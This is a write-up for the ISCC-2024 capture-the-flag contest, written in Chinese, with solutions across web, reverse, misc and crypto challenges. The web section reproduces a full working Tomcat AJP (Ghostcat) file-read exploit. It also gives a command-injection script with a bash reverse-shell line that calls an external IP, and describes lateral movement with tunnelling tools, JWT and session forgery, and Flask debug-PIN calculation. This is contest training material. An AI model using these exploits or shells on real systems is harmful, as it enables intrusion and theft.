ISCC-2024

web

还没想好名字的塔防游戏

打到第三波有弹窗

全局搜索这个提示恭喜，您已消灭第3波怪物，这是第一条提示：Bears Brew Storms
找到剩下的所有提示

根据题目说的xxx共有18位
把Mystic Defense War: The Secret of Guardian Towers and Magical Monsters的首大写字母和三个提示恭喜，您已消灭第3波怪物，这是第一条提示：Bears Brew Storms、恭喜，您已消灭第10波怪物，这是第二条提示：Opal Oceans Glow和恭喜，您已消灭第100000波怪物，这是第三条提示：Elves Whisper Wonders的首大写字母拼接起来就得flag
ISCC{MDWTSGTMMBBSOOGEWW}

原神启动

根据报错信息，得知是一个8.5.32的tomcat，这个版本存在一个CVE-2020-1938

网上有脚本，可以直接梭哈，读flag

POC

#!/usr/bin/env python
#CNVD-2020-10487  Tomcat-Ajp lfi
#by ydhcui
import struct

# Some references:
# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
def pack_string(s):
    if s is None:
        return struct.pack(">h", -1)
    l = len(s)
    return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
def unpack(stream, fmt):
    size = struct.calcsize(fmt)
    buf = stream.read(size)
    return struct.unpack(fmt, buf)
def unpack_string(stream):
    size, = unpack(stream, ">h")
    if size == -1: # null string
        return None
    res, = unpack(stream, "%ds" % size)
    stream.read(1) # \0
    return res
class NotFoundException(Exception):
    pass
class AjpBodyRequest(object):
    # server == web server, container == servlet
    SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
    MAX_REQUEST_LENGTH = 8186
    def __init__(self, data_stream, data_len, data_direction=None):
        self.data_stream = data_stream
        self.data_len = data_len
        self.data_direction = data_direction
    def serialize(self):
        data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
        if len(data) == 0:
            return struct.pack(">bbH", 0x12, 0x34, 0x00)
        else:
            res = struct.pack(">H", len(data))
            res += data
        if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
            header = struct.pack(">bbH", 0x12, 0x34, len(res))
        else:
            header = struct.pack(">bbH", 0x41, 0x42, len(res))
        return header + res
    def send_and_receive(self, socket, stream):
        while True:
            data = self.serialize()
            socket.send(data)
            r = AjpResponse.receive(stream)
            while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
                r = AjpResponse.receive(stream)

            if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
                break
class AjpForwardRequest(object):
    _, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28)
    REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE}
    # server == web server, container == servlet
    SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
    COMMON_HEADERS = ["SC_REQ_ACCEPT",
        "SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", "SC_REQ_AUTHORIZATION",
        "SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", "SC_REQ_COOKIE2",
        "SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT"
    ]
    ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"]
    def __init__(self, data_direction=None):
        self.prefix_code = 0x02
        self.method = None
        self.protocol = None
        self.req_uri = None
        self.remote_addr = None
        self.remote_host = None
        self.server_name = None
        self.server_port = None
        self.is_ssl = None
        self.num_headers = None
        self.request_headers = None
        self.attributes = None
        self.data_direction = data_direction
    def pack_headers(self):
        self.num_headers = len(self.request_headers)
        res = ""
        res = struct.pack(">h", self.num_headers)
        for h_name in self.request_headers:
            if h_name.startswith("SC_REQ"):
                code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
                res += struct.pack("BB", 0xA0, code)
            else:
                res += pack_string(h_name)

            res += pack_string(self.request_headers[h_name])
        return res

    def pack_attributes(self):
        res = b""
        for attr in self.attributes:
            a_name = attr['name']
            code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
            res += struct.pack("b", code)
            if a_name == "req_attribute":
                aa_name, a_value = attr['value']
                res += pack_string(aa_name)
                res += pack_string(a_value)
            else:
                res += pack_string(attr['value'])
        res += struct.pack("B", 0xFF)
        return res
    def serialize(self):
        res = ""
        res = struct.pack("bb", self.prefix_code, self.method)
        res += pack_string(self.protocol)
        res += pack_string(self.req_uri)
        res += pack_string(self.remote_addr)
        res += pack_string(self.remote_host)
        res += pack_string(self.server_name)
        res += struct.pack(">h", self.server_port)
        res += struct.pack("?", self.is_ssl)
        res += self.pack_headers()
        res += self.pack_attributes()
        if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
            header = struct.pack(">bbh", 0x12, 0x34, len(res))
        else:
            header = struct.pack(">bbh", 0x41, 0x42, len(res))
        return header + res
    def parse(self, raw_packet):
        stream = StringIO(raw_packet)
        self.magic1, self.magic2, data_len = unpack(stream, "bbH")
        self.prefix_code, self.method = unpack(stream, "bb")
        self.protocol = unpack_string(stream)
        self.req_uri = unpack_string(stream)
        self.remote_addr = unpack_string(stream)
        self.remote_host = unpack_string(stream)
        self.server_name = unpack_string(stream)
        self.server_port = unpack(stream, ">h")
        self.is_ssl = unpack(stream, "?")
        self.num_headers, = unpack(stream, ">H")
        self.request_headers = {}
        for i in range(self.num_headers):
            code, = unpack(stream, ">H")
            if code > 0xA000:
                h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
            else:
                h_name = unpack(stream, "%ds" % code)
                stream.read(1) # \0
            h_value = unpack_string(stream)
            self.request_headers[h_name] = h_value
    def send_and_receive(self, socket, stream, save_cookies=False):
        res = []
        i = socket.sendall(self.serialize())
        if self.method == AjpForwardRequest.POST:
            return res

        r = AjpResponse.receive(stream)
        assert r.prefix_code == AjpResponse.SEND_HEADERS
        res.append(r)
        if save_cookies and 'Set-Cookie' in r.response_headers:
            self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']

        # read body chunks and end response packets
        while True:
            r = AjpResponse.receive(stream)
            res.append(r)
            if r.prefix_code == AjpResponse.END_RESPONSE:
                break
            elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
                continue
            else:
                raise NotImplementedError
                break

        return res

class AjpResponse(object):
    _,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
    COMMON_SEND_HEADERS = [
            "Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified",
            "Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate"
            ]
    def parse(self, stream):
        # read headers
        self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")

        if self.prefix_code == AjpResponse.SEND_HEADERS:
            self.parse_send_headers(stream)
        elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
            self.parse_send_body_chunk(stream)
        elif self.prefix_code == AjpResponse.END_RESPONSE:
            self.parse_end_response(stream)
        elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
            self.parse_get_body_chunk(stream)
        else:
            raise NotImplementedError

    def parse_send_headers(self, stream):
        self.http_status_code, = unpack(stream, ">H")
        self.http_status_msg = unpack_string(stream)
        self.num_headers, = unpack(stream, ">H")
        self.response_headers = {}
        for i in range(self.num_headers):
            code, = unpack(stream, ">H")
            if code <= 0xA000: # custom header
                h_name, = unpack(stream, "%ds" % code)
                stream.read(1) # \0
                h_value = unpack_string(stream)
            else:
                h_name = AjpResponse.COMMON_SEND_HEADERS[code-0xA001]
                h_value = unpack_string(stream)
            self.response_headers[h_name] = h_value

    def parse_send_body_chunk(self, stream):
        self.data_length, = unpack(stream, ">H")
        self.data = stream.read(self.data_length+1)

    def parse_end_response(self, stream):
        self.reuse, = unpack(stream, "b")

    def parse_get_body_chunk(self, stream):
        rlen, = unpack(stream, ">H")
        return rlen

    @staticmethod
    def receive(stream):
        r = AjpResponse()
        r.parse(stream)
        return r

import socket

def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
    fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
    fr.method = method
    fr.protocol = "HTTP/1.1"
    fr.req_uri = req_uri
    fr.remote_addr = target_host
    fr.remote_host = None
    fr.server_name = target_host
    fr.server_port = 80
    fr.request_headers = {
        'SC_REQ_ACCEPT': 'text/html',
        'SC_REQ_CONNECTION': 'keep-alive',
        'SC_REQ_CONTENT_LENGTH': '0',
        'SC_REQ_HOST': target_host,
        'SC_REQ_USER_AGENT': 'Mozilla',
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Accept-Language': 'en-US,en;q=0.5',
        'Upgrade-Insecure-Requests': '1',
        'Cache-Control': 'max-age=0'
    }
    fr.is_ssl = False
    fr.attributes = []
    return fr

class Tomcat(object):
    def __init__(self, target_host, target_port):
        self.target_host = target_host
        self.target_port = target_port

        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.connect((target_host, target_port))
        self.stream = self.socket.makefile("rb", bufsize=0)

    def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
        self.req_uri = req_uri
        self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method))
        print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
        if user is not None and password is not None:
            self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '')
        for h in headers:
            self.forward_request.request_headers[h] = headers[h]
        for a in attributes:
            self.forward_request.attributes.append(a)
        responses = self.forward_request.send_and_receive(self.socket, self.stream)
        if len(responses) == 0:
            return None, None
        snd_hdrs_res = responses[0]
        data_res = responses[1:-1]
        if len(data_res) == 0:
            print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
        return snd_hdrs_res, data_res

'''
javax.servlet.include.request_uri
javax.servlet.include.path_info
javax.servlet.include.servlet_path
'''

import argparse
parser = argparse.ArgumentParser()
parser.add_argument("target", type=str, help="Hostname or IP to attack")
parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
args = parser.parse_args()
t = Tomcat(args.target, args.port)
_,data = t.perform_request('/asdf.jsp',attributes=[
    {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']},
    {'name':'req_attribute','value':['javax.servlet.include.path_info',args.file]},
    {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']},
    ])
print('----------------------------')
print("".join([d.data for d in data]))

掉进阿帕奇的工资

先注册

通过信息重置即可绕过成为管理员

在工资的年终奖分配计算那里存在命令执行

写一个脚本进行反弹shell的操作

import requests
from bs4 import BeautifulSoup
from urllib.parse import urlencode
import os

def xor_encrypt(plaintext, key):
    key_ord = ord(key)

    ciphertext = ""
    for char in plaintext:
        char_ord = ord(char)
        xor_result = char_ord ^ key_ord

        xor_result_char = chr(xor_result)

        ciphertext += xor_result_char

    return ciphertext

def print_ones(plaintext_length):
    return "1" * plaintext_length

def main():
    plaintext = os.sys.argv[1]
    key = "1"  # 00110001 是字符 '1' 的ASCII码

    ciphertext = xor_encrypt(plaintext, key)
    ones = print_ones(len(plaintext))
    result = req(ciphertext, ones)
    lines = result.split("\n")[1:]
    print("cmd: " + plaintext)
    index = lines[0].find(plaintext)
    lines[0] = lines[0][index + len(plaintext) :]
    result = "\n".join(lines)
    print(result)

def req(basicSalary, performanceCoefficient):
    url = "http://101.200.138.180:60000/gongzi_iscc.php"

    payload = urlencode(
        {
            "basicSalary": basicSalary,
            "performanceCoefficient": performanceCoefficient,
            "calculate": "",
        }
    )
    cookies = {"PHPSESSID": "ko3ccuvbc3hla124vm57ge3b6u"}
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    req = requests.request("POST", url, data=payload, cookies=cookies, headers=headers)
    html = req.text
    soup = BeautifulSoup(html, "html.parser")
    result = soup.find("div", class_="result-box").text
    return result

if __name__ == "__main__":
    main()

命令: python main.py “bash -c ‘bash -i >& /dev/tcp/47.94.237.26/8899 0>&1’”

得到的shell很多命令都没有，需要上传busybox进行操作

且daemon用户只有allPeple目录的权限

利用cat进行传输busybox

结合题目以及使用arp命令发现一个新的机器：secret.host.iscc2024_default (172.19.0.3)

用同样的方法上传fscan，扫出一个80端口

因为靶机上工具有限，所以利用chisel搭个隧道出来，然后使用dirsearch扫目录

扫出一个flag目录

代码审计

进行代码审计，得到：是一个flask服务，有两个接口：/geneSign和/De1ta

/geneSign接收一个param参数，并设置action=“scan”，然后使用key与这两个参数拼接在一起计算md5，作为签名返回。

在Exec()方法中首先使用action、param重新计算签名，与sign值对比，从而验证签名。然后判断action参数中是否有字符串”scan”，若有则将param作为文件名读取文件内容，并将读取的内容写入“已存在的文件”中。接着判断action中是否有字符串”read”，若有则从“已存在的文件”中读取内容，并且作为返回数据。

因此目的就是要使action参数中既有scan又有read，而param设置为flag.txt就可以。这样可以让flag先写入"已存在的文件"，然后再"已存在的文件"中读取出来。但geneSign()中设置了action=“scan”，并且后面计算了签名。

这里的漏洞出现在签名时将各个字符串拼接在一起再计算md5，所以重新计算签名时，字符串的内容未必要和之前的一样，只要它们拼接起来一样就可以了。

所以可以在生成密钥时，设置param=“flag.txtread”，这时action=“scan”，拼接起来是"flag.txtreadscan"。

在验证密钥时，设置param=“flag.txt”，action=“readscan”，这时拼接起来仍然是"flag.txtreadscan"，验证通过，满足读取flag.txt的条件。

生成密钥：

验证签名，读取flag

Flask中的pin值计算

username

F12看到一串字符，解密后得到一个新的目录

让他不要重复即可获得username: pincalculate

在问他给出appname和app.py绝对路径的时候得到的都是一样的，应该是监测到app关键字就返回了 一个新的目录/crawler

modname和appname

问海螺也没给，所以直接默认

app.py绝对路径

访问新的目录，要一秒内计算四位数的加减乘除，可以利用脚本完成

# http://101.200.138.180:10006/get_expression
# http://101.200.138.180:10006/crawler?answer=

import requests

# 获取表达式
response = requests.get("http://101.200.138.180:10006/get_expression")
expression = response.json()['expression']

# 替换除法和乘法运算符
expression = expression.replace('÷', '/').replace('×', '*')

# 计算表达式的结果
result = eval(expression)

# 将结果发送到指定的URL
response = requests.get(f"http://101.200.138.180:10006/crawler?answer={result}")
print(response.text)

得到了app.py的绝对路径：/usr/local/lib/python3.11/site-packages/flask/app.py
uuidnode mac的信息：uuidnode_mac位于/woddenfish

uuidnode mac

在点击抓包的时候发现有一个flask session

然后利用hackbar重新构造session即可，密钥在网站源码中可以得到：ISCC_muyu_2024

得到mac地址为：02:42:ac:18:00:02->0266172240002
以及machine_id的线索：/machine_id

machine_id

点击中间的VIP会员奖品返回了一个jwt_token
这里是有一个CVE-2022-39227的CVE可利用

脚本：https://github.com/user0x1337/CVE-2022-39227
注入role=vip
得到的新的token要经过url编码，不然会报400错误

得到了flask session的key
然后用脚本伪造session即可得到machine_id
脚本：https://github.com/noraj/flask-session-cookie-manager

计算pin

网上可以找到脚本Flask调试模式PIN值计算和利用

import hashlib

from itertools import chain

probably_public_bits = [

    'pincalculate'  # username 可通过/etc/passwd获取

    'flask.app',  # modname默认值

    'Flask',  # 默认值 getattr(app, '__name__', getattr(app.__class__, '__name__'))

    '/usr/local/lib/python3.11/site-packages/flask/app.py'  # 路径 可报错得到  getattr(mod, '__file__', None)

]

private_bits = [

    '2485378351106',  # mac地址十进制,使用print(int("02:42:ac:18:00:02".replace(":",""),16))，即可转换成10进制

    '39c61de4-9c0a-4738-b95d-ef3f488d7222'

]

# 下面为源码里面抄的，不需要修改

h = hashlib.sha1()

for bit in chain(probably_public_bits, private_bits):

    if not bit:

        continue

    if isinstance(bit, str):

        bit = bit.encode('utf-8')

    h.update(bit)

h.update(b'cookiesalt')

  

cookie_name = '__wzd' + h.hexdigest()[:20]

  

num = None

if num is None:

    h.update(b'pinsalt')

    num = ('%09d' % int(h.hexdigest(), 16))[:9]

  

rv = None

if rv is None:

    for group_size in 5, 4, 3:

        if len(num) % group_size == 0:

            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')

                          for x in range(0, len(num), group_size))

            break

    else:

        rv = num

  

print(rv)

flag

访问http://101.200.138.180:10006/console然后输入pin值即可获得flag

Reverse

迷失之门

一个简单的字符替换，利用ida字符然后分析伪代码即可

exp

str1 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
str2 = 'abcdefghijklmnopqrstuvwxyz'
str3 = '0123456789+/-=!#&*()?;:*^%'
str4 = 'DABBZXQESVFRWNGTHYJUMKIOLPC'
result = 'FSBBhKZuUgLKVjJVSCFTUrctpG6'

input_str = ''
for j in range(len(result)):
    for i in range(33, 129):
        if i != 127 and i > 32:
            v22 = i - ord(str4[j])
            if v22>0:
                if v22 > 25:
                    if v22 > 51:
                        v1 = str3[v22 - 52]
                    else:
                        v1 = str2[v22 - 26]
                    if v1 == result[j]:
                        input_str += chr(i)
                else:
                    v2 = str1[v22]
                    if v2 == result[j]:
                        input_str += chr(i)
print(input_str)

Misc

精装四合一

用010打开四张图片，每张图片的最后都有附加的数据

提取附加数据，并把附加数据都进行异或0xff

剩下的三张图片也是如此操作

然后即可发现每段数据的开头分别为50、4B、03、04，这就是zip压缩包的文件头。

所以利用脚本循环读取这四个文件的字节数据，并存为一个新的文件

# 打开四个文件
file_paths = ["left_foot_invert.png", "left_hand_invert.png", "right_foot_invert.png", "right_hand_invert.png"]
files = [open(path, "rb") for path in file_paths]

# 创建一个新文件用于写入
output_file = open("output.zip", "wb")

try:
    while True:
        for file in files:
            byte = file.read(1)  # 从每个文件中读取一个字节
            if byte:
                output_file.write(byte)  # 将字节写入新文件
            else:
                break  # 如果文件结束，则停止读取该文件
        else:
            continue  # 如果所有文件都还没结束，则继续循环
        break  # 如果有文件结束了，则退出循环
finally:
    # 关闭所有文件
    for file in files:
        file.close()
output_file.close()

得到一个压缩包，发现是加密了

用010打开看了，不是伪加密，那就直接爆破，得到密码：65537

把得到的word文档解压后在document.xml里面发现一串字符串，经过yafu分解得到了p和q

在media里面看到一张无法正常打开的图片，查看16进制文本，结合文件名猜测这就是密文

写一个脚本进行解密

import gmpy2
# import 

with open('true_flag.jpeg','rb') as f:
    enc = int.from_bytes(f.read(),'big')

e = 65537
p = 167722355418488286110758738271573756671
q = 100882503720822822072470797230485840381
n = 16920251144570812336430166924811515273080382783829495988294341496740639931651

phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)

dec = pow(enc,d,n)
flag = int(dec).to_bytes(32,'big')

print(flag)

RSA_KU

解方程组，解出(p-1)和(q-1)即可，代码中分别以a和b作为代替

from sympy import symbols, solve
import gmpy2
from Crypto.Util.number import *

n = 129699330328568350681562198986490514508637584957167129897472522138320202321246467459276731970410463464391857177528123417751603910462751346700627325019668100946205876629688057506460903842119543114630198205843883677412125928979399310306206497958051030594098963939139480261500434508726394139839879752553022623977
e = 65537
c = 104272570188425816457550830426972655347800820644283360435261275919128895675122726204907979154858245194128555722510677792210638866179920747302589321193622617409463246735661050043076112493584695377171633331916803789706141304131866457367323925012895712310019862372095302292831205579224765261224857162558289307156
a = 129699330328568350681562198986490514508637584957167129897472522138320202321246467459276731970410463464391857177528123417751603910462751346700627325019668067056973833292274532016607871906443481233958300928276492550916101187841666991944275728863657788124666879987399045804435273107746626297122522298113586003834
b = 129699330328568350681562198986490514508637584957167129897472522138320202321246467459276731970410463464391857177528123417751603910462751346700627325019668066482326285878341068180156082719320570801770055174426452966817548862938770659420487687194933539128855877517847711670959794869291907075654200433400668220458

# 定义变量
x, y = symbols('x y')

# 定义方程组
eq1 = n-x-2*y-1-a
eq2 = n-2*x-y-1-b

# 求解方程组
solution = solve((eq1, eq2), (x, y))

# 打印解
print("x =", solution[x])
print("y =", solution[y])

phi = int(solution[x]*solution[y])

print(phi)

d = gmpy2.invert(e,phi)

m = pow(c, d, n)

print(long_to_bytes(m))

Number_is_the_key

把文件解压后，在xl/worksheets/sheet1.xml文件里存在大量的单元格数据，但是只有单元格的位置，并没有内容

那就自行赋值，把单元格显示出来，把所有的”/><c”字符替换成”>1<c”，即往单元格内填充数字1

再变回xlsx文件，可以看到若隐若现的二维码图像

把列宽变成2，然后添加条件格式，单元格的值等于1的时候，填充黑色，即可得到一张清晰的二维码，扫码后即可得到flag

flag：flag{NLomDaRRoBUJ}

Funzip

Base64隐写，脚本跑一下即可

import base64

b64charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

with open('f380d850e6ebdb19b7d0743.txt', 'r') as f:
    hind_bin = ''
    for line in f.readlines():
        now_str = line.strip()
        if len(now_str)%4 != 0:
            now_str += "="*(4-len(now_str)%4) 

        row_str = base64.b64encode(base64.b64decode(now_str)).decode()
        offset = abs(b64charset.index(now_str.replace('=','')[-1]) - b64charset.index(row_str.replace('=','')[-1]))

        equalnum = row_str.count('=')
        if equalnum:
            hind_bin += bin(offset)[2:].zfill(equalnum*2)
        print(hind_bin)

    hind_str = ''.join([chr(int(hind_bin[i:i + 8], 2)) for i in range(0, len(hind_bin), 8)])

print(hind_str)